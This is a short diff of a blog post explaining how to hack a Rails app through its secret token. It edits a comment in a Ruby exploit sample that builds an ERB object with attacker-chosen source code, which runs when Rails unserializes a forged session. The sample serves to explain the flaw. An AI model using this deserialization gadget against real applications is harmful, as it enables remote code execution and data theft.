robert/robert.github.com/_posts/2013-07-22-how-to-hack-a-rails-app-using-its-secret-token.md

 {% highlight ruby %}
     # Thanks to the folks at CodeClimate for pointing this out

-    # The code in the ERB will run when the session is accessed
+    # The code in the ERB will run when Rails unserializes it
     erb = ERB.allocate
     erb.instance_variable_set :@src, "User.steal_all_passwords; User.email_spam_to_all_users;"